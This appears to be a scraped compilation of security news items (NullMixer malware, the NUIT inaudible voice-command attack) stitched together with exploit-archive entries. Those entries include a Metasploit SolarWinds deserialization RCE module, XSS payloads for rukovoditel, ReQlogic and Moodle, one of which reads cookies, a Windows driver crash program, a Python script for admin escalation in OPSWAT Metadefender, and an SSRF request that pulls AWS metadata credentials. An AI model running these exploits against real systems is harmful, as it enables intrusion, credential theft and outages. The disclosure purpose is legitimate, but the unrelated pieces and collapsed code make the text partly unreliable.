The NullMixer loader has compromised thousands of endpoints in the US, France, and Italy, stealing data and selling it to Dark Web data dealers, all without setting off alarm bells.

A new version of the NullMixer dropper includes polymorphic loaders from malware-as-a-service (MaaS) and pay-per-install (PPI) providers on Dark Web markets, and it's being used to target organizations in North America, as well as Italy and France.

The malware, a known threat, typically installs a suite of downloaders, banking Trojans, stealers, and spyware on victims' systems, all in one go. The new additions, however, make the threat even more dangerous, according to a detailed NullMixer analysis this week from Security Affairs, because the threat can adapt to whatever the specific environment is that it infects.

The analysis also explains how threat actors have been using search engine optimization (SEO) poisoning and malicious video tutorials to con IT staff into installing the new malware. In just one month, the newly enhanced NullMixer malware has established initial access into more than 8,000 endpoints, stealing data to sell it to brokers in underground markets.

Most victims are running Windows 10 Professional and Enterprise operating systems, the NullMixer report said, adding that the malware also seems to have successfully infected Windows Embedded IoT environments.

"The NullMixer package is including new polymorphic loaders by third parties MaaS and PPI service providers in the underground markets, and also pieces of controversial, potentially North-Korean linked PseudoManuscript code," the researchers explained about the latest NullMixer malware strain. "Our insights into a recent NullMixer malware operation revealed Italy and France are the favorite European countries from the opportunistic attackers' perspective."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

NullMixer Polymorphic Malware Variant Infects 8K Targets in Just a Month

A technique, dubbed the "Near-Ultrasound Inaudible Trojan" (NUIT), allows an attacker to exploit smartphones and smart speakers over the Internet, using sounds undetectable by humans.

The sensitivity of voice-controlled microphones could allow cyberattackers to issue commands to smartphones, smart speakers, and other connected devices using near-ultrasound frequencies undetectable by humans for a variety of nefarious outcomes — including taking over apps that control home Internet of Things (IoT) devices.

The technique, dubbed a Near-Ultrasound Inaudible Trojan (NUIT), exploits voice assistants like Siri, Google Assistant, or Alexa and the ability of many smart devices to be controlled by sound. According to researchers at the University of Texas at San Antonio (UTSA) and the University of Colorado at Colorado Springs (UCCS), most devices are so sensitive that they can pick up voice commands even if the sounds are not in the normal frequency range of human voices. 

In a series of videos posted online, the researchers demonstrated attacks on a variety of devices, including iOS and Android smartphones, Google Home and Amazon Echo smart speakers, and Windows Cortana. 

In one scenario, a user might be browsing a website that is playing NUIT attack commands in the background. The victim might have a mobile phone with voice control enabled in close proximity. The first command issued by the attacker might be to turn down the assistant's volume so that responses are harder to hear, and thus less likely to be noticed. After that, subsequent commands could ask the assistant to use a smart-door app to unlock the front door let's say. In less concerning scenarios, commands could cause an Amazon Alexa device to start playing music or give a weather report.

The attack works broadly, but the specifics vary per device.

"This is not only a software issue or malware," said Guenevere Chen, an associate professor in the UTSA Department of Electrical and Computer Engineering, in a statement. "It's a hardware attack that uses the internet. The vulnerability is the nonlinearity of the microphone design, which the manufacturer would need to address."

    

Using inaudible sounds played through a speaker, an attacker can issue commands to smart devices. Source: UTSA and UCCS

Attacks using a variety of audible and non-audible frequencies have a long history in the hacking world. In 2005, for example, a group of researchers at the University of California, Berkeley, found that they could recover nearly all of the English characters typed during a 10-minute sound recording, and that 80% of 10-character passwords could be recovered within the first 75 guesses. In 2019, researchers from Southern Methodist University used smartphone microphones to record audio of a user typing in a noisy room, recovering 42% of keystrokes.

The latest research appears to use the same techniques as a 2017 paper from researchers at Zhejiang University, which used ultrasonic signals to attack popular voice-activated smart speakers and devices. In the attack, dubbed the DolphinAttack, researchers modulated voice commands on an ultrasonic carrier signal, making them inaudible. Unlike the current attack, however, the DolphinAttack used a bespoke hardwired system to generate the sounds rather than using connected devices with speakers to issue commands.

**Defenses Against NUIT Cyberattacks**

The latest attack allows any device compatible with audio commands to be used as a conduit for malicious activity. Android phones could be attacked through inaudible signals playing in a YouTube video on a smart TV, for instance. iPhones could be attacked through music playing from a smart speaker and vice versa.

In most cases, the inaudible "voice" does not even need to have to be recognizable as the authorized user, said UTSA's Chen in a recent statement announcing the research.

"Out of the 17 smart devices we tested, \[attackers targeting\] Apple Siri devices need to steal the user's voice, while other voice assistant devices can get activated by using any voice or a robot voice," she said. "It can even happen in Zoom during meetings. If someone unmutes themselves, they can embed the attack signal to hack your phone that's placed next to your computer during the meeting."

However, the receiving speaker has to be turned up fairly loud for an attack to work, while the length of the malicious commands has to be less than 0.77 seconds, which can help mitigate drive-by attacks. And devices that are hooked into earbuds and headsets are less likely to be vulnerable to being used by an attacker, according to Chen.

"If you don't use the speaker to broadcast sound, you're less likely to get attacked by NUIT," she said. "Using earphones sets a limitation where the sound from earphones is too low to transmit to the microphone. If the microphone cannot receive the inaudible malicious command, the underlying voice assistant can't be maliciously activated by NUIT."

The technique is demonstrated in dozens of videos posted online by the researchers, who did not respond to a request for comment before publication.

Hey, Siri: Hackers Can Control Smart Devices Using Inaudible Sounds

The SolarWinds Information Service (SWIS) is vulnerable to remote code execution by way of a crafted message received through the AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/proto/amqp/version_0_9_1'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  def initialize    super(      'Name' => 'SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE',      'Description' => %q{        The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the        AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted        message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.      },      'Author' => [        'Justin Hong', # vulnerability research, Trend Micro        'Lucas Miller', # vulnerability research, Trend Micro        'Piotr Bazydło', # vulnerability discovery, reported to ZDI        'Spencer McIntyre' # metasploit module      ],      'Arch' => ARCH_CMD,      'Platform' => 'win',      'References' => [        [ 'CVE', '2022-38108' ],        [ 'URL', 'https://www.zerodayinitiative.com/blog/2023/2/27/cve-2022-38108-rce-in-solarwinds-network-performance-monitor' ],        [ 'URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2022-38108' ]      ],      'DefaultOptions' => {        'WfsDelay' => 10      },      'Targets' => [        [ 'Automatic', {} ]      ],      'DefaultTarget' => 0,      'Privileged' => true,      'DisclosureDate' => '2022-10-19',      'Notes' => {        'Stability' => [CRASH_SAFE],        'Reliability' => [REPEATABLE_SESSION],        'SideEffects' => [IOC_IN_LOGS]      }    )    register_options([      Opt::RHOST,      Opt::RPORT(5671),      OptString.new('USERNAME', [true, 'The username to authenticate with', 'orion']),      OptString.new('PASSWORD', [true, 'The password to authenticate with', ''])    ])    register_advanced_options(      [        OptBool.new('SSL', [ true, 'Negotiate SSL/TLS for outgoing connections', true ]),        Opt::SSLVersion      ]    )  end  def peer    rhost = datastore['RHOST']    rport = datastore['RPORT']    if Rex::Socket.is_ipv6?(rhost)      "[#{rhost}]:#{rport}"    else      "#{rhost}:#{rport}"    end  end  def print_status(msg)    msg = "#{peer} - #{msg}"    super  end  def exploit    amqp_client = Rex::Proto::Amqp::Version091::Client.new(      datastore['RHOST'],      port: datastore['RPORT'],      context: { 'Msf' => framework, 'MsfExploit' => self },      ssl: datastore['SSL'],      ssl_version: datastore['SSLVersion']    )    unless amqp_client.login(datastore['USERNAME'], datastore['PASSWORD'])      fail_with(Failure::NoAccess, "Authentication failed for user #{datastore['USERNAME']}.")    end    print_status('Successfully connected to the remote server.')    channel = amqp_client.channel_open    vprint_status('Successfully opened a new channel.')    channel.basic_publish(      routing_key: 'SwisPubSub',      message: ::Msf::Util::DotNetDeserialization.generate(        payload.encoded,        gadget_chain: :ObjectDataProvider,        formatter: :JsonNetFormatter      ),      properties: {        message_type: 'System.Windows.Data.ObjectDataProvider'      }    )    print_status('Successfully published the message to the channel.')    channel.close    amqp_client.connection_close  rescue Rex::Proto::Amqp::Error::UnexpectedReplyError => e    fail_with(Failure::UnexpectedReply, e.message)  rescue Rex::Proto::Amqp::Error::AmqpError => e    fail_with(Failure::Unknown, e.message)  ensure    amqp_client.close  endend

SolarWinds Information Service (SWIS) Remote Command Execution

Musescore 3.0 to 4.0.1 has a stack buffer overflow vulnerability that occurs when reading misconfigured midi files. If attacker can additional information, attacker can execute arbitrary code.

**Describe the bug**  
It only affects the Windows version.  
In src/importexport/midi/internal/midishared/midifile.cpp

void MidiFile::skip(qint64 len)
{
    // Note: if MS is updated to use Qt 5.10, this can be implemented with QIODevice::skip(), which should be more efficient
    //       as bytes do not need to be moved around.
    if (len <= 0) {
        return;
    }
#if (!defined (\_MSCVER) && !defined (\_MSC\_VER))
    char tmp\[len\];
    read(tmp, len);
#else
    const int tmp\_size = 256;    // Size of fixed-length temporary buffer. MSVC does not support VLA.
    char tmp\[tmp\_size\];
    while (len > tmp\_size) {
        read(tmp, len); //vulnerability 
        len -= tmp\_size;
    }
    // Now len is <= tmp\_size, last read fits in the buffer.
    read(tmp, tmp\_size);
#endif
}

It is copying the length of len, not tmp\_size. If len is bigger than 256, it will overwrite stack.  
This leads to a buffer overflow and overwrite the stack cookies. If an attacker knows the stack cookie value, it can lead to code execution. Check PoC.midi in PoC.zip.  
This vulnerability works from version 3.0 to 4.0.1(latest)

  
PoC.zip

If you have any problems, contact me via kunshim@naver.com

CVE-2023-26923: [MU4 Issue] Stack buffer overflow vulnerability while parse MIDI file · Issue #16346 · musescore/MuseScore

rukovoditel version 3.2.1 suffers from a cross site scripting vulnerability.

    ## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)## Author: nu11secur1ty## Date: 11.03.2022## Vendor: https://www.rukovoditel.net/## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1## Description:The application is vulnerable to DOM-based cross-site scriptingattacks. Data is read from `location.hash` and passed to`jQuery.parseHTML`.The attacker can use this vulnerability to create an unlimited numberof accounts on this system until it crashed.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```POSTGET /rukovoditel/index.php?module=users/restore_password HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63Safari/537.36Connection: closeCache-Control: max-age=0Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;cookie_test=please_accept_for_session;app_login_redirect_to=module%3Ddashboard%2FUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/loginSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)## Proof and Exploit:[href](https://streamable.com/i1qmfk)## Time spent`3:45`

rukovoditel 3.2.1 Cross Site Scripting

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

**ReQlogic 11.3 Cross Site Scripting**

Posted Mar 28, 2023

Authored by Okan Kurtulus

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2022-41441

SHA-256 | 5227ba88f59a5d4cccd1b7cd664927cd29c2794c9b0bb18836fe0f6ab3662551

Download | Favorite | View

**ReQlogic 11.3 Cross Site Scripting**

    # Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)# Date: 9 October 2022# Exploit Author: Okan Kurtulus# Vendor Homepage: https://reqlogic.com# Version: 11.3# Tested on: Linux# CVE : 2022-41441# Proof of Concept:1- Install ReQlogic v11.32- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=33- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.#XSS Payload:</script><script>alert(1)</script>#Affected PrametersPOBatchWaitDuration#Final URLshttp://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>

**File Tags**

*   ActiveX (932)
*   Advisory (80,599)
*   Arbitrary (15,917)
*   BBS (2,859)
*   Bypass (1,653)
*   CGI (1,022)
*   Code Execution (7,047)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,306)
*   DoS (22,932)
*   Encryption (2,359)
*   Exploit (50,720)
*   File Inclusion (4,180)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,689)
*   Intrusion Detection (876)
*   Java (2,957)
*   JavaScript (830)
*   Kernel (6,449)
*   Local (14,297)
*   Magazine (586)
*   Overflow (12,543)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,502)
*   Python (1,488)
*   Remote (30,282)
*   Root (3,534)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,824)
*   Shell (3,133)
*   Shellcode (1,206)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,171)
*   TCP (2,384)
*   Trojan (687)
*   UDP (880)
*   Virus (663)
*   Vulnerability (31,381)
*   Web (9,467)
*   Whitepaper (3,740)
*   x86 (946)
*   XSS (17,581)
*   Other

**File Archives**

*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (370)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,714)
*   Fedora (1,691)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,130)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,923)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,448)
*   UNIX (9,208)
*   UnixWare (185)
*   Windows (6,532)
*   Other

ReQlogic 11.3 Cross Site Scripting

Moodle LMS version 4.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS)# Date: 26/10/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://moodle.org/# Software Link: https://git.in.moodle.com/moodle# Version: 4.0# Tested on: XAMPP, Windows 10# Contact: https://twitter.com/dmaral3nozDescription:A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public LicenseVulnerable Code:line 111 in file "course/search.php"echo $courserenderer->search_courses($searchcriteria);Steps to exploit:1) Go to http://localhost/course/search.php2) Insert your payload in the "search"Proof of concept (Poc):The following payload will allow you to run the javascript -"><img src=# onerror=alert(document.cookie)>

Moodle LMS 4.0 Cross Site Scripting

Tunnel Interface Driver suffers from a denial of service vulnerability.

    // Exploit Title: Tunnel Interface Driver - Denial of Service// Date: 07/15/2022// Exploit Author: ExAllocatePool2// Vendor Homepage: https://www.microsoft.com/// Software Link: https://www.microsoft.com/en-us/software-download/windows10// Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288)// Tested on: Microsoft Windows// GitHub Repository: https://github.com/Exploitables/MSRC-1#include <Windows.h>#include <stdio.h>#define TARGET_DEVICE "\\\\.\\GLOBALROOT\\Device\\TunnelControl"int main(int argc, char** argv);int main(int argc, char** argv){  HANDLE h_driver = CreateFileA(TARGET_DEVICE, 0x80, 0, 0, OPEN_EXISTING, 0, 0);  unsigned long long input_output = 0x4242424242424242;  unsigned long bytes_returned = 0x43434343;  unsigned char unused = 0;  SetConsoleTitleA("https://msrc.microsoft.com/");  printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!");  if (h_driver == (HANDLE)-1)  {    printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %d (0x%x)", GetLastError(), GetLastError());    unused = getchar();    return 1;  }  printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver);  printf("\n[!] Triggering a denial of service via arbitrary read in 3...");  for (int i = 2; i > 0; i--)  {    Sleep(1000);    printf("\n[!] %d...", i);  }  DeviceIoControl(h_driver, 0, &input_output, 8, &input_output, 8, &bytes_returned, 0);  unused = getchar();  printf("\n[-] Exploit failed. The machine should have crashed.");  return 0;}

Tunnel Interface Driver Denial Of Service

OPSWAT Metadefender Core version 4.21.1 suffers from a privilege escalation vulnerability.

    # Exploit Title: OPSWAT Metadefender Core - Privilege Escalation# Date: 24 October 2022# Exploit Author: Ulascan Yildirim# Vendor Homepage: https://www.opswat.com/# Version: Metadefender Core 4.21.1# Tested on: Windows / Linux# CVE : CVE-2022-32272# =============================================================================# This is a PoC for the Metadefender Core Privilege escalation vulnerability.# To use this PoC, you need a Username & Password.# The OMS_CSRF_TOKEN allows users to execute commands with higher privileges.# =============================================================================#!/usr/bin/env python3import requestsimport jsonfrom getpass import getpassurl = input("Enter URL in this Format (http://website.com): ")username = input("Username: ")password = getpass("Password: ")url_login = url+'/login'url_user = url+'/user'logindata = {"user":username,"password":password}## Get the OMS_CSRF_TOKEN & session cookieresponse_login = requests.post(url_login, json = logindata).json()json_str = json.dumps(response_login)resp = json.loads(json_str)token = resp['oms_csrf_token']session = resp['session_id']## Prepare Header & Cookieheaders = {    "oms_csrf_token": token,}cookie = {    "session_id_ometascan": session}## Set Payload to get Admin rolepayload = '{"roles": ["1"]}'response = requests.put(url_user,headers=headers,cookies=cookie,data=payload)print("Response status code: "+str(response.status_code))if response.status_code == 200:    print("Expolit Successful!")else:    print("Exploit Unsuccessful")

OPSWAT Metadefender Core 4.21.1 Privilege Escalation

X-Skipper-Proxy version 0.13.237 suffers from a server-side request forgery vulnerability.

    #Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)#Date: 24/10/2022#Exploit Author: Hosein Vita & Milad Fadavvi#Vendor Homepage: https://github.com/zalando/skipper#Software Link: https://github.com/zalando/skipper#Version: < v0.13.237#Tested on: Linux#CVE: CVE-2022-38580Summary:Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.Proof Of Concept:1- Add header "X-Skipper-Proxy"  to your request2- Add the aws metadata to the pathGET /latest/meta-data/iam/security-credentials HTTP/1.1Host: yourskipperdomain.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36X-Skipper-Proxy: http://169.254.169.254Connection: closeReference:https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2

Tag

#windows